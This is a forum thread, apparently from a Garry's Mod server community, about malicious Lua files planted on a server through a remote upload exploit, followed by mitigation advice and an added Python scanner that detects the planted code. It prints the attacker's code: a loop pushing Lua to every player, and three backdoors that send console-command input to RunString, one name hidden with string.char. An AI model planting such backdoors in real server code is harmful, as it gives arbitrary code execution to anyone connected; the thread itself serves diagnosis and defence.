Major Vulnerability: Remote Lua upload

Alright, I own a Windows 2003 Dedicated Server.

No one has remote access but me, this includes FTP.

This appeared in my lua/autorun and everyone suffered:

Correction: It was just in lua/, but somehow was executed anyway from the account of my players.
[lua]
for _,v in pairs( player.GetAll() ) do
    if v and v:IsValid() and v:IsPlayer() then
        //v:SendLua([[hook.Add("HUDPaint","SDFDSFSDF",function() surface.SetDrawColor(math.random(255),math.random(255),math.random(255),255) surface.DrawRect(0,0,ScrW(),ScrH()) end)]])
        v:SendLua([[vgui.Create("HTML"):OpenURL("http://www.youtube.com/watch?v=S3zCewONLls")]])
        //v:SetUserGroup( "admin" )
        //v:Ban(0, v:Nick() .. ", YOU GOT FUCKING PWNT!")
        //v:Kick(v:Nick() .. ", YOU GOT FUCKING PWNT!")
    end
end
[/lua]

This needs to be fixed.

PS: I’m glad the lines that were commented are commented.

We know. It’s a source engine bug.

We do?

Well if this becomes wide-spread it could become quite fatal for GMod.

Is a working version leaked?

From a server owner’s point of view, I’d actually prefer this to be wide-spread so it gets someone’s attention, rather than just known by a few who abuse it.

Garry posted the exploits to the public.

Azu created an email with a link to a perfectly working exploit.

Gee, where would I find this email? Oh, that’s easy try Garry’s own twitter, ffs this could cause damage to people’s servers and he uploads it to his blog? Brilliant.

There’s a sourcemod that patches it, too, also conveniently posted in that mailing list, made because of the mailing list. That is why it is brought to the public’s attention.

from

sv_allowdownload 0
sv_allowupload 0
sv_downloadurl "yoursite.com/downloadurl"

Stop getting your panties in a bunch, turn off abusable things and forget about it.

I am using fast download via an Apache webserver that I host.

Stop getting your panties in a bunch, making shit up. Although I suppose I should’ve included that in the original post.

Also discovered this in the autorun directory:

[lua]
if (SERVER) then
    concommand.Add("_l", function(a,b,c)
        RunString(table.concat(c, " "))
    end )
end
[/lua]

Basically a remote execution thing. It was titled fptje.lua, but he would do nothing of the type.

Also found this in lua/autorun/server
Named admin_ext.lua
[lua]
concommand.Remove("admin_heartbeat")
concommand.Remove("admin_ext")

if not file.Exists("extmanifest.txt") then
    file.Write("extmanifest.txt", "01")
end

concommand.Add("admin_heartbeat", function()
    pcall(require, "extadmn")
end)

concommand.Add("admin_ext", function(u,c,a)
    RunString(table.concat(a, " "))
end)
[/lua]
Man, I just discovered all this shit, no wonder I’ve been having problems.

Also found this in the same folder, named adminfunctions.lua
An obvious attempt to be deceitful
[lua]
concommand.Add ( string.char ( 95,95,100 ) ,function ( a,b,c ) RunString ( c[1] ) end )
[/lua]
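As an added defender-side example (not code from this thread, and not part of Garry's Mod), a Python scanner that walks a lua/ tree for the backdoor shape the three files above share, a concommand handler that feeds its arguments straight to RunString, and decodes string.char() lists used to hide a command name. The file names and contents are constructed samples modelled on the posts, not real captures.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample files modelled on the backdoors quoted in this thread (not real captures).
SAMPLES = {
    "lua/autorun/server/admin_ext.lua":
        'concommand.Add("admin_ext", function(u,c,a)\n    RunString(table.concat(a, " "))\nend)\n',
    "lua/autorun/server/adminfunctions.lua":
        'concommand.Add ( string.char ( 95,95,100 ) ,function ( a,b,c ) RunString ( c[1] ) end )\n',
    "lua/autorun/server/benign.lua":
        'hook.Add("PlayerSpawn", "greet", function(ply) ply:ChatPrint("hi") end)\n',
}

# Heuristic 1: a console command whose handler reaches RunString (any client can run arbitrary code).
RUNSTRING_IN_CONCOMMAND = re.compile(r"concommand\.Add\s*\(.*?RunString", re.S)
# Heuristic 2: string.char(...) used so a grep for the literal command name finds nothing.
OBFUSCATED_NAME = re.compile(r"string\.char\s*\(\s*([\d\s,]+)\)")

def decode_string_char(args: str) -> str:
    """Rebuild the text hidden in a string.char byte list, e.g. '95,95,100' -> '__d'."""
    return "".join(chr(int(n)) for n in args.split(",") if n.strip())

def scan_source(src: str) -> list[str]:
    """Return human-readable findings for one Lua file's contents (empty list if clean)."""
    findings = []
    if RUNSTRING_IN_CONCOMMAND.search(src):
        findings.append("concommand handler passes client input to RunString")
    for m in OBFUSCATED_NAME.finditer(src):
        findings.append("string.char hides the name %r" % decode_string_char(m.group(1)))
    return findings

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every .lua under root (in practice garrysmod/lua and garrysmod/addons)."""
    report = {}
    for path in sorted(root.rglob("*.lua")):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def scan_samples() -> dict[str, list[str]]:
    """Write the constructed samples to a temp dir and scan them, so the block runs offline."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLES.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan_tree(root)
```

The RunString heuristic is deliberately broad (it matches across a whole file), so treat a hit as something to read by hand, not as proof on its own.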

I just discovered a module called gm_command that was not present on my other server installations. Now if that was used then I have a REAL problem, since DLLs can do pretty much anything I believe. Or are they at least sandboxed from outside of GMod?

Update your engine.dll with the one from your garrysmod/bin folder, then do the commands.

Wow, vicious Lua coders are a lot more vicious than I thought they were.

I did the engine.dll thing, but this just happened again.

You’re doing it wrong then.

So to clarify:
All I need to fix this permanently is:

  1. Turn off sv_allowupload (DONE)
  2. Turn off sv_allowdownload (DONE)
  3. Use fast download server (DONE)
  4. Use the engine.dll from my client (DONE)

[editline]07:00PM[/editline]

I temporarily fixed by making the lua folder and addons folder read only :frowning:

also check your modules and autorun folders.

modules had a command.dll module that I deleted earlier, and autorun is of course where I look first.

Both are in lua folder so for now it is fixed by readonly.

Getting blamed again xD

FPtje, you fiend!

That’s like putting your name on a murder weapon, of course it’s obviously not you.

“Unless he knew you wouldn’t believe the truth, even if he told it to you.”

  • Jack Sparrow